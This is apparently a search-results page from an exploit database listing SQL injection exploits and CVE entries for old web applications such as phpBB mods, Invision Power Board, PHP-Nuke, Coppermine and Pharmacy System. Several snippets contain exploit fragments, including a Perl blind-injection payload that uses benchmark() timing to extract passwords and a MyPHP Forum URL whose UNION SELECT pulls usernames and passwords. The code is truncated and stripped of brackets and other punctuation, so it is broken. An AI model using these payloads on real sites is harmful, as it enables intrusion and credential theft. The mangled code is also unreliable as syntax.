123 matches found
Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit
Exploit for unknown platform in category web applications =================================================== Lizardware CMS post$host, user = $param, pass = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "userpassword,$uidz,1=$charz,"...
Lizardware CMS 0.6.0 - Blind SQL Injection
!/usr/bin/perl -w Lizardware CMS post$host, user = $param, pass = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "userpassword,$uidz,1=$charz,". "benchmark230000000,char0,". "0 from $ptableusers where userid=$userid"; return $send; for1..3...
phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl --------------------------------------------------------------- phpBB 3 Mod Tag Board = 4 Remote Blind SQL Injection Exploit by athos - stakerathotmaildotit http://bx67212.netsons.org/forum/viewforum.php?f=3...
phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
Exploit for unknown platform in category web applications =============================================================== phpBB 3 Mod Tag Board = 4 Remote Blind SQL Injection Exploit =============================================================== !/usr/bin/perl...
WP Comment Remix 1.4.3 Remote SQL Injection Exploit
No description provided by source. ?php / WP Comment Remix 1.4.3 SQL Injection Proof of Concept By g30rg3x g30rg3xatchxsecuritydotorg Advisory: http://chxsecurity.org/advisories/adv-3-full.txt PoC Mirror: http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip Attention: This is a...
Invision Power Board <= 2.3.5 Remote SQL Injection Exploit
No description provided by source. ?php errorreportingEALL; /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// // IPB = 2.3.5 sql injection exploit // Version 1.0 // written by Janek Vind "waraxe" //...
psys-sql.txt
pSys - 0.7.0. alpha shownews SQL Injection Bug by: h0yt3r Bug in here: if isset$REQUEST'shownews' && $REQUEST'shownews' != "" $sqlbefehl="Select titel from $tabnews Where id = '".intval$REQUEST'shownews'."'"; $gettitel = mysqlquery$sqlbefehl,$serverid; $news=mysqlfetcharray$gettitel; $pagetitle =...
CVE-2008-1918
SQL injection vulnerability in submit.php in PHP-Fusion 6.01.14 and 6.00.307, when magicquotesgpc is disabled and the database table prefix is known, allows remote authenticated users to execute arbitrary SQL commands via the submitinfo parameter in a link submission action. NOTE: it was later...
cpg1414-sql.txt
table prefix\n"; print " - hostname\n"; print " - web dirname \n"; print " - force mode - '0' - for Off or "album number" for force mode On \n"; print " table prefix - prefix of sql tables\n"; print " example: " . $argv0 . " coppermine.site photo/ 1 cpg1410\n"; credits; / FUNCTIONS / if...
PHP-Nuke < 8.0 (sid) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ================================================= PHP-Nuke version Tested on 7.9 & 6.0 '; if $argc table prefix\n"; print "ex.: " . $argv0 . " phpnuke.org 7\n"; credits; exit; / few definitions / if empty$argv3 $prefix = 'nuke'; define...
Coppermine Photo Gallery 1.4.10 - SQL Injection
Coppermine Photo Gallery 1.4.10 - SQL Injection table prefix\n"; print " - hostname\n"; print " - web dirname \n"; print " - force mode - '0' - for Off or "album number" for force mode On \n"; print " table prefix - prefix of sql tables\n"; print " example: " . $argv0 . " coppermine.site photo/ 1...
myphp-sql.txt
Name : MyPHP Forum So we can execute an sql injection thrught the bugged variable $id. PoC: http://Site/faq.php?action=view&id=-1'+union+select+1,concatusername,0x3a,password,3+from+tableprefixmember+where+uid=1/ Sql injection in member.php So $member variable isn't controlled so we can exploit i...
WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility
No description provided by source. --==+================================================================================+==-- --==+ WSN Links Basic Edition SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz ...
WSN Links Basic Edition - 'catid' SQL Injection
--==+================================================================================+==-- --==+ WSN Links Basic Edition SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: wsnforum.com DORK:...
CVE-2007-3434
index.php in Pharmacy System 2 and earlier allows remote attackers to obtain sensitive information via a ' quote character in the page parameter, which reveals the table prefix in an error message...
Code injection
index.php in Pharmacy System 2 and earlier allows remote attackers to obtain sensitive information via a ' quote character in the page parameter, which reveals the table prefix in an error message...
FreeBSD : wordpress -- XMLRPC SQL Injection (0838733d-1698-11dc-a197-0011098b2f36)
Secunia reports : Slappter has discovered a vulnerability in WordPress, which can be exploited by malicious users to conduct SQL injection attacks. Input passed to the 'wp.suggestCategories' method in xmlrpc.php is not properly sanitised before being used in SQL queries. This can be exploited to...
pharmacy-sql.txt
--==+================================================================================+==-- --==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SCRIPT DOWNLOAD: PAY...
Pharmacy System 2.0 (index.php ID) Remote SQL Injection Vulnerability
No description provided by source. --==+================================================================================+==-- --==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==-- --==+================================================================================+==-- AUTHOR:...
Pharmacy System 2.0 - index.php?ID SQL Injection
Pharmacy System 2.0 - index.php?ID SQL Injection --==+================================================================================+==-- --==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==-- --==+================================================================================+==...